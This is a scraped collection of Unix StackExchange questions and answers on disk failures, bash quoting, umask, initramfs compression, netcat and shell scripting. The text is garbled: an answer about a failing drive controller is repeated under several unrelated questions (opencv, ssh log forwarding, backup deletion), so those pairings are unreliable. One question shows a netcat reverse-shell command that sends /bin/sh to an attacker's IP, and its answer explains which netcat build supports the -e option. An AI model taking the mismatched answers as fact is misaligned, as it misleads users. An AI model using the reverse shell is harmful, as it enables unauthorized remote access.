10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 02 00 00 00 06 00 00[15404.922442] blk_update_request: critical medium error, dev sdc, sector 2 op 0x0:(READ) flags 0x0 phys_seg 3 prio class 0[15404.922445] Buffer I/O error on dev sdc, logical block 1, async page read[15404.923930] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s[15404.923932] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current] [15404.923934] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error[15404.923936] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00[15404.923938] blk_update_request: critical medium error, dev sdc, sector 0 op 0x0:(READ) flags 0x0 phys_seg 1 prio class 0[15404.925438] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s[15404.925442] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current] [15404.925446] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error[15404.925449] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 02 00 00 00 06 00 00[15404.925453] blk_update_request: critical medium error, dev sdc, sector 2 op 0x0:(READ) flags 0x0 phys_seg 3 prio class 0[15404.925481] ldm_validate_partition_table(): Disk read failed.[15404.927181] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s[15404.927185] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current] [15404.927189] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error[15404.927192] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00[15404.927195] blk_update_request: critical medium error, dev sdc, sector 0 op 0x0:(READ) flags 0x0 phys_seg 1 prio class 0[15404.937694] Dev sdc: unable to read RDB block 0[15404.945196] sdc: unable to read partition table OS : Debian 10 (Bullseye) with kernel 5.5.13-2 smartctl output is: smartctl 7.1 2019-12-30 r5022 [x86_64-linux-5.5.0-1-amd64] (local build)Copyright (C) 2002-19, Bruce Allen, Christian Franke, www.smartmontools.org=== START OF INFORMATION SECTION ===Model Family: Seagate Mobile HDDDevice Model: ST2000LM007-1R8174Serial Number: WDZCWPT0LU WWN Device Id: 5 000c50 0b926222dFirmware Version: SBK2User Capacity: 18,446,744,073,709,551,104 bytes [18446 PB]Sector Size: 512 bytes logical/physicalRotation Rate: 7200 rpmDevice is: In smartctl database [for details use: -P show]ATA Version is: ATA8-ACS T13/1699-D revision 4SATA Version is: SATA 3.0, 6.0 Gb/sLocal Time is: Mon Apr 27 18:21:43 2020 EDTSMART support is: Available - device has SMART capability.SMART support is: EnabledRead SMART Data failed: scsi error aborted command=== START OF READ SMART DATA SECTION ===SMART Status command failed: scsi error aborted commandSMART overall-health self-assessment test result: UNKNOWN!SMART Status, Attributes and Thresholds cannot be read.Read SMART Log Directory failed: scsi error aborted commandRead SMART Error Log failed: scsi error aborted commandRead SMART Self-test Log failed: scsi error aborted commandSelective Self-tests/Logging not supported SeaGate Utilities information gives: ========================================================================================== SeaChest_SMART - Seagate drive utilities - NVMe Enabled Copyright (c) 2014-2019 Seagate Technology LLC and/or its Affiliates, All Rights Reserved SeaChest_SMART Version: 1.12.0-1_19_23 X86_64 Build Date: Jun 10 2019 Today: Mon Apr 27 18:07:59 2020==========================================================================================/dev/sg3 - BACKUP+ - 90CD8083BJBG - SCSI Vendor ID: Seagate Model Number: BACKUP+ Serial Number: 90CD8083BJBG Firmware Revision: 0304 World Wide Name: 5000000000000001 Drive Capacity (PB/PiB): 144.12/128.00 Temperature Data: Current Temperature (C): Not Reported Highest Temperature (C): Not Reported Lowest Temperature (C): Not Reported Power On Time: Not Reported Power On Hours: Not Reported MaxLBA: 281474976710653 Native MaxLBA: Not Reported Logical Sector Size (B): 512 Physical Sector Size (B): 512 Sector Alignment: 0 Rotation Rate (RPM): Not Reported Form Factor: Not Reported Last DST information: Not supported Long Drive Self Test Time: Not Supported Interface speed: Not Reported Annualized Workload Rate (TB/yr): Not Reported Total Bytes Read (B): Not Reported Total Bytes Written (B): Not Reported Encryption Support: Not Supported Cache Size (MiB): Not Reported Read Look-Ahead: Enabled Write Cache: Enabled SMART Status: Unknown or Not Supported ATA Security Information: Not Supported Firmware Download Support: Full, Segmented Specifications Supported: SPC-4 SBC-3 UAS SPC-4 Features Supported: Power Conditions [Enabled] Informational Exceptions [Mode 0]
Based on your smartctl output, the problem isn't that the physical storage of the drive has failed; instead, the fact that it can't even correctly report the size (which should be "burned in" to the firmware) suggests that the controller electronics at some point in the chain have failed. Most external USB hard disks have basic but not always advanced SMART support; Seagate drives have been known not to provide even the baseline expected support, so I'm not willing to say for certain that the SMART failures are a result of the controller failure. However, the inaccurately reported size indicates that's what happened. If this is an "all-in-one" external drive, you might be able to recover the data by removing the actual hard disk and connecting it to a standalone USB-HD adapter. (This would be the case if the failure is in the USB interface electronics and not the onboard drive electronics.) If that doesn't work and you get similar errors, your data may be recoverable if you send it to a recovery lab, although this tends to be very expensive and only worthwhile if you have something like priceless family photos or a valuable Bitcoin wallet.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582949", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/409130/" ] }
582,961
I'm trying to install opencv with pip3 on my Devuan GNU/Linux 3, and this is what happens: $ pip3 install opencvCollecting opencvCould not install packages due to an EnvironmentError: 404 Client Error: Not Found for url: https://pypi.org/simple/opencv and indeed, if you browse that URL, you get a 404 page. Why is this happening? Am I to blame? Devuan? pypi.org administrators? Somebody else? Also - can I replace the URL somehow? Or manually install from somewhere?
Based on your smartctl output, the problem isn't that the physical storage of the drive has failed; instead, the fact that it can't even correctly report the size (which should be "burned in" to the firmware) suggests that the controller electronics at some point in the chain have failed. Most external USB hard disks have basic but not always advanced SMART support; Seagate drives have been known not to provide even the baseline expected support, so I'm not willing to say for certain that the SMART failures are a result of the controller failure. However, the inaccurately reported size indicates that's what happened. If this is an "all-in-one" external drive, you might be able to recover the data by removing the actual hard disk and connecting it to a standalone USB-HD adapter. (This would be the case if the failure is in the USB interface electronics and not the onboard drive electronics.) If that doesn't work and you get similar errors, your data may be recoverable if you send it to a recovery lab, although this tends to be very expensive and only worthwhile if you have something like priceless family photos or a valuable Bitcoin wallet.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582961", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/34868/" ] }
582,967
We are currently running a command on a Linux box that we have little control over. The command tails a log file, piping the results to an outbound SSH connection to our server, redirecting the output to a file. The command we use to do this is: sh -c tail -f /var/log/x/a.log | ssh [email protected] -T 'cat - > /media/z/logs/a.log' We are then able to perform additional processing of the captured log segment. However, we now need the ability to forward the streaming output of an additional log file using the same ssh connection. Doing sh -c tail -f /var/log/x/a.log /var/log/x/b.log | ssh [email protected] -T 'cat - > /media/z/logs/a.log' works, but it combines the two log files into one (with a header appearing before each line saying which file it came from). We need the output to bee two different files but are limited to a single outbound SSH connection from the log server to our server. We do not have sudo or admin rights on the log server and are not able to get any software that would require it installed. If it matters, the remote log server is running CentOS and our server is running Ubuntu. Is there a way to split the output into two files? Or some other method of running multiple commands in parallel over the reverse SSH connection?
Based on your smartctl output, the problem isn't that the physical storage of the drive has failed; instead, the fact that it can't even correctly report the size (which should be "burned in" to the firmware) suggests that the controller electronics at some point in the chain have failed. Most external USB hard disks have basic but not always advanced SMART support; Seagate drives have been known not to provide even the baseline expected support, so I'm not willing to say for certain that the SMART failures are a result of the controller failure. However, the inaccurately reported size indicates that's what happened. If this is an "all-in-one" external drive, you might be able to recover the data by removing the actual hard disk and connecting it to a standalone USB-HD adapter. (This would be the case if the failure is in the USB interface electronics and not the onboard drive electronics.) If that doesn't work and you get similar errors, your data may be recoverable if you send it to a recovery lab, although this tends to be very expensive and only worthwhile if you have something like priceless family photos or a valuable Bitcoin wallet.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582967", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/298767/" ] }
582,974
I have backup files created daily in its own directory: 2020-04-012020-04-022020-04-03 so on How can I write a code to delete older directory and its content. I have below code so far, it's deleting the directory but it's not smart enough. Because if I copy files in the directory to another another directory the modified date will change: find ~/delete/* -type d -ctime +6 -exec rm -rf {} \;
Based on your smartctl output, the problem isn't that the physical storage of the drive has failed; instead, the fact that it can't even correctly report the size (which should be "burned in" to the firmware) suggests that the controller electronics at some point in the chain have failed. Most external USB hard disks have basic but not always advanced SMART support; Seagate drives have been known not to provide even the baseline expected support, so I'm not willing to say for certain that the SMART failures are a result of the controller failure. However, the inaccurately reported size indicates that's what happened. If this is an "all-in-one" external drive, you might be able to recover the data by removing the actual hard disk and connecting it to a standalone USB-HD adapter. (This would be the case if the failure is in the USB interface electronics and not the onboard drive electronics.) If that doesn't work and you get similar errors, your data may be recoverable if you send it to a recovery lab, although this tends to be very expensive and only worthwhile if you have something like priceless family photos or a valuable Bitcoin wallet.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582974", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/409147/" ] }
583,064
#!/usr/bin/env bashset -euo pipefailif [ -z "$BUILD_DATE" ]; then export BUILD_DATE="$(date +%s%N)" echo "???"else echo "!!!!!!!"fi The above does not output anything as it runs into an error: env/local-testing.sh:22: BUILD_DATE: parameter not set . Is there an alternative to running set +u and set -u again surrounding this conditional?
If you're running under set -u and have a variable that might be unset, and you would need to test whether it's empty with the -z test, then you can use if [ -z "${BUILD_DATE:-}" ]; then The "${BUILD_DATE:-}" would expand to an empty string if the BUILD_DATE variable is empty or unset.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/583064", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/124109/" ] }
583,156
How do you get the first file in a directory in bash? First being the what the shell glob finds first. My search for getting the first file in a directory in bash brought me to an old post with a very specific request. I'd like to document my solution to the general question for posterity and make a place for people to put alternative solutions they'd like to share.
To get the first file in the current dir you can put the expansion in an array and grab the first element: files=(*)echo "${files[0]}"# ORecho "$files" # since we are only concerned with the first element Assuming your current dir contains multiple dirs you can loop through and grab the first file like so: for dir in *; do files=($dir/*) echo "${files[0]}"done But be aware that, depending on your shell settings, files=(*) may return an array of one element (that is '*') if there are no files. So you have to check that the file names in the array correspond to files which actually exist (and bear in mind that * is a valid file name).
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583156", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/409331/" ] }
583,296
Is it "user mask" or something? Wikipedia does not have details, but says the feature has been in Unix since 1978. POSIX just says it is the "file mode creation mask".
There's a long-standing explanation, exemplified by this entry in Wolfram Rosler's list , that it means "user". That entry was submitted in 2000, and attributes it to the fact that the "umask" set a U_cmask field in the process' " u area". This is a somewhat dubious explanation, the doubt acknowledged in the original by it being put in the form of a question, because there are several other things in the " u area", all of whose fields were conventionally named u_ something , that are not set by system calls begining with "u". It is possible that it is a rationalization two decades after the fact. That the "u" stands for "user" is, on the other hand, widely accepted nowadays, and was widely accepted back in 2000, even though the " u area" explanation for that is dubious. Books about UNIX have described the umask as the "user file creation mask" since the late 1980s (although none of them make any mention of the " u area"). It's described that way in the printed manuals for AT&T Unix System 5 Release 3. It's described that way in the 1989 X/Open Portability Guide . It's described that way in Peter Norton's 1991 Guide to Unix . Simson Garfinkel's and Gene Spafford's 1991 Practical UNIX Security explicitly outright says umask (UNIX shorthand for "user file-creation mode mask") The problem is that the word "user" in the expansion of the name doesn't occur in works before 1985. The earliest that I have been able to find is Rebecca Thomas' 1985 A user guide to the UNIX system , followed by " umask (user mask)" in the Andersons' 1986 The UNIX C Shell Field Guide . Stephen R. Bourne's 1983 The UNIX System has a collection of manual entries for 7th Edition UNIX. The one for the umask() system call on page 294 does not contain the word "user" anywhere, just calling it a "file creation mode mask". The one for sh makes no mention of the subject at all. The 1983 Unix Time-Sharing System: Unix Programmer's Manual from Bell Labs repeats Bourne's wording (which is to be expected): NAME umask — set file creation mode mask SYNOPSIS umask(complmode) DESCRIPTION Umask sets a mask used whenever a file is created by creat (T) or mknod (2): […] On the BSD side of the universe, the 1987 UNIX Programmer's Reference Manual (PRM): 4.3 Berkeley Software Distribution, Virtual VAX-11 Version also makes no mention of the word "user": NAME umask — set file creation mode mask SYNOPSIS oumask = umask(numask) int oumask, numask; DESCRIPTION Umask sets the process's file mode creation mask to numask and returns the previous value of the mask. […] There's no "user" in Marc J. Rochkind's 1985 Advanced UNIX programming , just "file mode creation mask". Nor in the Waite Group's 1987 Unix System V Bible ("file-creation mask"). It has been widely accepted for the better part of 4 decades that the "u" stands for "user"; but it's hard to trace that back to the initial coinage of the name, the linkage to the " u area" only appears two decades after the fact, the word "user" seems to have appeared at some point between 7th Edition UNIX and AT&T Unix System 5 Release 3, and that word may have been introduced after the fact as a seemingly reasonable expansion for "u" by people writing formal doco. Further reading So what was the "u area" in UNIX?
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/583296", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/169677/" ] }
583,371
The touchpad on my laptop is a poor design, because it doesn't recede down into its housing to avoid my thenar and hypothenar's proclivity for inadvertent tap-to-clicks. In Ubuntu 19.10, using this same laptop, I was able to toggle off "Tap to Click", as shown here . However, in Kubuntu 20.04, this option is grayed out (disabled), and cannot be Toggled: Is there another way that I might disable Tap-to-Click, given that the GUI isn't offering the ability to toggle this setting?
Referance: https://askubuntu.com/questions/1179275/enable-tap-to-click-kubuntu I had to add Option "Tapping" "True" to the entry MatchIsTouchpad in the file /usr/share/X11/xorg.conf.d/40-libinput.conf . The exact name of the file might be different for other people. In the end, the relevant section will look like something like this: Section "InputClass" Identifier "libinput touchpad catchall" MatchIsTouchpad "on" Option "Tapping" "True" MatchDevicePath "/dev/input/event*" Driver "libinput"EndSection You need to be root to edit the file and reboot your system after the changes!
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/583371", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/40149/" ] }
583,409
I would like to modify a i3Blocks script (utility blocks for i3 WM enviroment) that print out the bandwidth in/out .. In particular I would like to change the color of this instruction output: echo -n " $INLABEL" using color #9fbc00 how can I do that ? thanks
Referance: https://askubuntu.com/questions/1179275/enable-tap-to-click-kubuntu I had to add Option "Tapping" "True" to the entry MatchIsTouchpad in the file /usr/share/X11/xorg.conf.d/40-libinput.conf . The exact name of the file might be different for other people. In the end, the relevant section will look like something like this: Section "InputClass" Identifier "libinput touchpad catchall" MatchIsTouchpad "on" Option "Tapping" "True" MatchDevicePath "/dev/input/event*" Driver "libinput"EndSection You need to be root to edit the file and reboot your system after the changes!
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/583409", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/409555/" ] }
583,413
Just like the title says, is this possible? Say I have a file named myfile.dat , rm isn't going to do the job, and if I don't have the ability to install wipe or shred or some other tool, can I securely erase this file "by myself"?
Even with such tools, whether such a method of secure erasing works, depends on the underlying filesystem. If you are using a modern Copy On Write based filesystem, these tools will not work at all, since they would not write to the previous blocks used by the file. If you like to do secure erasing, you would either need support for that feature built into the filesystem, or the filesystem would need to implement an interface that allows to retrieve the disk block numbers for a file. The latter method however is a security risk and can only be supported for a privileged user.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/583413", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/285444/" ] }
583,428
I'm sure some version of this question has been asked and answered before, but I've looked around and haven't found the exact answer. Perhaps someone here can help the lightbulb go on for me. I'm on a Mac with Mojave 10.14.6 and bash 3.2.57(1)-release. I'm learning the basics of regular expressions by following along with an online tutorial, and practicing both on the online site https://regexr.com , and by using grep in bash on my local machine. I'm practicing with a small text file (called small.txt) with three things in it: 9.009-009500 I understand that the . wildcard will match any one character at that spot. So, in the online regex engine (JavaScript) that I'm using /9.00/g will match all three strings 9.00 9-00 and 9500 . It's the same if I use grep on the command line: ~/bin $ grep 9.00 small.txt9.009-009500 So far, so good. The tutorial says that to turn the . from a metacharacter into a literal, you have to escape it. Okay. so putting /9\.00/g into the online regex box will only match 9.00 , as expected, not 9-00 nor 9500. Great. However, if I enter that same syntax into grep on the command line, I get an unexpected result: ~/bin $ grep 9\.00 small.txt9.009-009500 Same as before. To get grep to work, I either have to double quote the whole string: ~/bin $ grep "9\.00" small.txt9.00 or just double quote the escaped character: ~/bin $ grep 9"\."00 small.txt9.00 There may well be some other quoting choices that I could make that would also give me the correct result. This is making it hard for me to wrap my head around the basics of regular expression, because, clearly, I first have to understand how grep in the shell differs from traditional regular expression syntax. It's hard enough learning all of the rules for regular expressions, but when you add in the differences between classic regular expression and the behavior of the bash shell, my head explodes. Anyway, wondering if there was a clear explanation that will clear this up for me and set me on the path to properly learning regular expressions that I can use with grep on the command line. (None of the courses on regular expression point out the differences between the command line version of grep with bash, and the "pure" regular expression syntax that you see on the online regex testers.) I know that there are differences between engines at the advanced level, but this seems to be something so basic, that I feel that I must be missing something. Thanks.
Why? because your shell interprets some special characters, such as \ in your example. You are running into troubles because you do not protect the string that you try to pass as argument to grep via the Shell. Several solutions: singlequoting the string, doublequoting the string (with doublequoting the shell will interpret several things, such as $variables , before sending the resulting string to the command), or not use quoting (which I strongly advise against) but add backslashes in the right places to prevent the shell to interpret the next characters before sending it to the command. I recommend to protect the string via single quotes, as it keeps almost everything literraly: grep '9\.0' #send those 4 characters to grep in a single argument The Shell pass the singlequoted string literally. Note: The only thing you can't include inside a single quoted shell string is a single quote (as this ends the singlequoting). To include a singlequote inside a singlequoted shell string, you need to first end the singlequoting, immediately add an escaped singlequote \' (or one between doublequotes: "'" ) and then immediately reenter the singlequoting to continue the single quoted string : for exemple to have the shell execute the command grep a'b , you could write the parameter as 'a'\''b' so that the shell sends a'b to grep: so write: grep 'a'\''b' , or grep 'a'"'"'b' If you insist on not using quoting, you need your shell to have a \\ to have it send a \ to grep. grep 9\\.0 # ie: a 9, a pair \\, a ., and a 0 , and the shell interprets the pair \\ into a literal \ If you use doublequotes: you need to take into account that the shell will interprets several things first ( $vars , \ , etc). for exemple when it sees an unescaped or unquoted \ , it waits the next character to decide how to interpret it. \w is seen as a single letter w , \\ is seen as a single letter \ , etc. grep "9\\.0" # looks here the same as not quoting at all... #but doublequoting allows you to have spaces, etc, inside the string
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583428", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/408739/" ] }
583,461
Say I have a simple Node.js server like: const http = require('http');const server = http.createServer((req,res) => res.end('foobar'))server.listen(3000, () => { console.log(JSON.stringify({"listening": 3000}));}); and then with bash: #!/usr/bin/env bashnode server.js | while read line; do if [[ "$line" == '{"listening":3000}' ]]; then : fidone# here I want to process more crap my goal is to only continue the script after the server has started actually listening for requests. The best thing I can come up with this this: #!/usr/bin/env bashmkfifo foomkfifo bar(node server.js &> foo) &(while true; do cat foo | while read line; do if [[ "$line" != '{"listening":3000}' ]]; then echo "$line" continue; fi echo "ready" > bar donedone) &cat bar && { # do my thing here?} is there a less verbose/simpler way to do this? I just want to proceed only when the server is ready and the only good way I know of doing that is to using stdout to print a message and listen for that.
Why? because your shell interprets some special characters, such as \ in your example. You are running into troubles because you do not protect the string that you try to pass as argument to grep via the Shell. Several solutions: singlequoting the string, doublequoting the string (with doublequoting the shell will interpret several things, such as $variables , before sending the resulting string to the command), or not use quoting (which I strongly advise against) but add backslashes in the right places to prevent the shell to interpret the next characters before sending it to the command. I recommend to protect the string via single quotes, as it keeps almost everything literraly: grep '9\.0' #send those 4 characters to grep in a single argument The Shell pass the singlequoted string literally. Note: The only thing you can't include inside a single quoted shell string is a single quote (as this ends the singlequoting). To include a singlequote inside a singlequoted shell string, you need to first end the singlequoting, immediately add an escaped singlequote \' (or one between doublequotes: "'" ) and then immediately reenter the singlequoting to continue the single quoted string : for exemple to have the shell execute the command grep a'b , you could write the parameter as 'a'\''b' so that the shell sends a'b to grep: so write: grep 'a'\''b' , or grep 'a'"'"'b' If you insist on not using quoting, you need your shell to have a \\ to have it send a \ to grep. grep 9\\.0 # ie: a 9, a pair \\, a ., and a 0 , and the shell interprets the pair \\ into a literal \ If you use doublequotes: you need to take into account that the shell will interprets several things first ( $vars , \ , etc). for exemple when it sees an unescaped or unquoted \ , it waits the next character to decide how to interpret it. \w is seen as a single letter w , \\ is seen as a single letter \ , etc. grep "9\\.0" # looks here the same as not quoting at all... #but doublequoting allows you to have spaces, etc, inside the string
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583461", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/-1/" ] }
583,473
I am trying to get a shell on host machine from another (attacker) machine.Attacker machine is listening.I am running below command on my host machine nc 123.123.123.12 4444 -e /bin/sh Output I get: nc: invalid option -- 'e'usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl] [-m minttl] [-O length] [-P proxy_username] [-p source_port] [-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]] [destination] [port]
There are multiple variants of netcat. Install the version of netcat developed by nmap.org On my Ubuntu system, there are 2 packages netcat and ncat . The one from nmap is ncat and supports the -e option. The other one does not. You need to find the right package for your distribution. EDIT:On Kali Linux (2022.3), the packages netcat-openbsd and netcat-traditional will install the netcat version without the -e option. If you want the one with the -e option, install the package ncat . After installing ncat , the binary to launch will be /usr/bin/ncat
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583473", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/409619/" ] }
583,519
I want to disable compression of /boot/initrd.img file to boot a bit faster. My disk is large enough to accomodate the extra 10MB. To be honest I think that should be the default, who can't afford some megabytes of disk space nowadays. For embedded scenarios, it could be manually enabled. Looking into /etc/initramfs-tools/initramfs.conf , there are options to change the compression type COMPRESS: [ gzip | bzip2 | lz4 | lzma | lzop | xz ] but no option to disable compression. I tried None and none , no effect. As a workabout I manually decompress initrd.img-4.19.0-8-amd64 using gunzip . But each time a kernel update is installed I have to decompress again.
There’s no option provided to do this, but since mkinitramfs is a shell script, one can be added without needing to recompile. In /usr/sbin/mkinitramfs , look for case "${compress}" in Add a “cat” line in the set of options: cat) compress="cat" ;; This will allow COMPRESS=cat to be specified in initramfs.conf . You will have to re-do this every time mkinitramfs is restored from the package (on upgrade).
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/583519", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/276189/" ] }
583,534
So I have a program (say, programA ), that will give me an output, for example: yes , no , maybe , probably , possibly , impossible , banana . I want to make a script that will do something, whatever it is, based on that output. Let's say I only need to account for yes , maybe and banana . So far what I would do, is use case like so: case $program_output in yes) echo "good word: $program_output" ;; maybe) echo "good word: $program_output" ;; banana) echo "good word: $program_output" ;; *) echo "bad word: $program_output" ;;esac But recently I was fiddling with the if statement, and found out I can do this faster like so: if [[ "yesmaybebanana" =~ ${program_output} ]]; then echo "good word: ${program_output}"; else echo "bad word: ${program_output}";fi Is there any reason why I should not use the if statement for this?This is a case where $program_output cannot have spaces in it, and it's a limited list of words it can output.
The if version is not going to be as reliable as case here because itwill catch all substrings of yesmaybebanana - it will match for b , bebana etc: #!/usr/bin/env bashprogram_output='bebana'if [[ "yesmaybebanana" =~ ${program_output} ]]; then echo "good word: ${program_output}"; else echo "bad word: ${program_output}"; fi Output: good word: bebana And it's not portable - try running it with dash: $ dash ./a.sh./a.sh: 6: ./a.sh: [[: not foundbad word: bebana You can significantly simplify your case version by using multiplewords in a single line: case $program_output in yes | maybe | banana) echo "good word: $program_output" ;; *) echo "bad word: $program_output" ;;esac
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/583534", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/409671/" ] }
583,782
I did google this topic and all results are talking about <<EOF .But I saw scripts using <<-EOF , but I can not find anywehre by googling.Thus, What is different between <<-EOF and <<EOF in bash script?Thanks a lot.
<<-EOF will ignore leading tabs in your heredoc, while <<EOF will not. Thus: cat <<EOF Line 1 Line 2EOF will produce Line 1 Line 2 while cat <<-EOF Line 1 Line 2EOF produces Line 1Line 2
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583782", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/365713/" ] }
583,794
Can i create a peer to peer network using Ipv6 link local address scope?I should be able to ping from System A to System B's Link local (fe80 address space) and vice versa. In other words I want to set up a peer to peer IPv6 network using explicitly defined Link local addresses If yes then any pointers to set up the same in aws would be very helpful.
<<-EOF will ignore leading tabs in your heredoc, while <<EOF will not. Thus: cat <<EOF Line 1 Line 2EOF will produce Line 1 Line 2 while cat <<-EOF Line 1 Line 2EOF produces Line 1Line 2
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583794", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/399648/" ] }
583,795
I want to match ids from file A with file B, to save it in third file with columns that belongs to both files. I have tried almost all awks that I found, but somehow doesnt work properly. I would appreciate you help! fileA : id;name1;"sam"4;"jon" fileB : id;surname5;"smith"1;"khon" file3 : id;name;surname1;"sam";"khon"
<<-EOF will ignore leading tabs in your heredoc, while <<EOF will not. Thus: cat <<EOF Line 1 Line 2EOF will produce Line 1 Line 2 while cat <<-EOF Line 1 Line 2EOF produces Line 1Line 2
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583795", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/409944/" ] }
583,822
I am using Alpine Linux 3.11 as a new Docker container. I have the default $PATH variable, which reads: echo $PATH/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin When I place a script, wait-for (which is a shell script starting with #!/bin/sh ) in /usr/local/bin it displays fine: chmod +x wait-formv wait-for /usr/local/bin/wait-forls -l /usr/local/bin/wait-for produces: -rwxr-xr-x 1 root root 1451 May 1 16:09 /usr/local/bin/wait-for It also runs when I use sh /usr/local/bin/wait-for to execute it. However, when I am in /usr/src/ and I try to run wait-for I get sh: wait-for: not found My understanding is that because the /usr/local/bin directory is in $PATH then any script inside that directory should be called globally. What have I misunderstood? I can run the file from /usr/src/ if I use sh /usr/local/bin/wait-for , but not if I use /usr/local/bin/wait-for (without sh prefix), which returns sh: /usr/local/bin/wait-for: not found . The output of /etc/fstab is: /dev/cdrom /media/cdrom iso9660 noauto,ro 0 0 /dev/usbdisk /media/usb vfat noauto,ro 0 0
Your interactive shell is dash (masquerading as sh ). The dash shell says sh: /usr/local/bin/wait-for: not found when it tries to execute a script that has a faulty #! -line pointing to an interpreter that can't be found. It happens to be exactly the same error that you would get when the command that you type can't be found, so it's easy to think it's a $PATH issue (it's not in this case). Oher shells have more informative error messages ( bash and zsh says "bad interpreter: No such file or directory" and also tells you what interpreter it tried to execute). Since the file is a DOS text file , the #! -line instructs the shell to run the script with /bin/sh\r , where \r is a common representation of a carriage return character, which is part of the line termination in DOS text files. On a Unix system, a carriage return is an "ordinary character" and not at all part of the line termination, which mean that it tries to start /bin/sh\r to run your script, and then fails as that file does not exist. It is therefore the interpreter that is "not found", not the script itself. Running the script with an explicit interpreter bypasses the #! -line, always, which is why you don't get the error when you do that. However, each line in the script would still have the carriage returns at the end of them, which may cause the script to malfunction under some conditions. Simply re-saving the file as a Unix text file, or converting it with dos2unix , would resolve your issue.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583822", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/407043/" ] }
583,928
I want to have a bash script which: Runs the "strings" command on each file in current directory Searches the output of strings for each file for specific terms using grep I have the following, but the script output does not show any matches: #!/bin/bashecho "Searching files in directory for secrets and urls"for file in ./*do echo "=====$file=====" strings ${file} | egrep -wi --color 'secret\|password\|key\|credential|\http'done I've also tried strings $file | egrep -wi --color 'secret\|password\|key\|credential|\http' and eval "strings ${file} | egrep -wi --color 'secret\|password\|key\|credential|\http'" but these do not appear to work. The script outputs the filenames, but not the matches.
You're using egrep which is the same as grep -E , i.e. it enables the use of extended regular expressions. In an extended regular expression, | is an alternation (which is what you want to use), and \| matches a literal | character. You therefore want grep -w -i -E 'secret|password|key|credential|http' or grep -i -E '\<(secret|password|key|credential|http)\>' where \< and \> matches word boundaries. Or grep -w -i -F \ -e secret \ -e password \ -e key \ -e credential \ -e http ... if you want to do string comparisons rather than regular expression matches. Additionally, you will want to always double quote variable expansions. This would allow you to also process files with names that contain whitespace characters (space, tab, newline) and names that contain filename globbing characters ( * , ? , [...] ) correctly: #!/bin/shfor name in ./*; do [ ! -f "$name" ] && continue # skip non-regular files printf '==== %s ====\n' "$name" strings "$name" | grep ...done See also Why does my shell script choke on whitespace or other special characters? When is double-quoting necessary?
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/583928", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/187351/" ] }
583,983
I have the following folder structure: alpha src doit.py beta src doit.py gama src doit.py and the command python ../../doit.py --clean --add_source inner I want to create an alias, doit that executes the corresponding file depending in which parent folder I'm located. For example: If I'm inside alpha or one of is sub-directories, when I use: doit --addsource extra to actually run: python /home/alpha/src/doit.py --clean --addsource extra If I'm inside beta or one of is sub-directories, when I use: doit --addsource inner to actually run: python /home/beta/src/doit.py --clean --addsource inner
